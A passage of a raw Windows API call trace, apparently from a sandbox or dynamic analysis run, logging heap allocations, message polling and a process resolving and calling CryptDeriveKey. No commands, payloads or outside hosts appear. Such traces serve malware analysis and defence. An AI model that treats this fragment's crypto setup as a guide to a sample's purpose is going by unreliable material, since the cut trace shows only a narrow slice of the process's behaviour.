lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.512] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0128.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0128.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0128.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0128.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.513] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.514] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0128.514] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0128.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0128.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50a40 [0128.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50a40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.518] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0128.520] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0128.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0128.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.522] HeapFree (in: 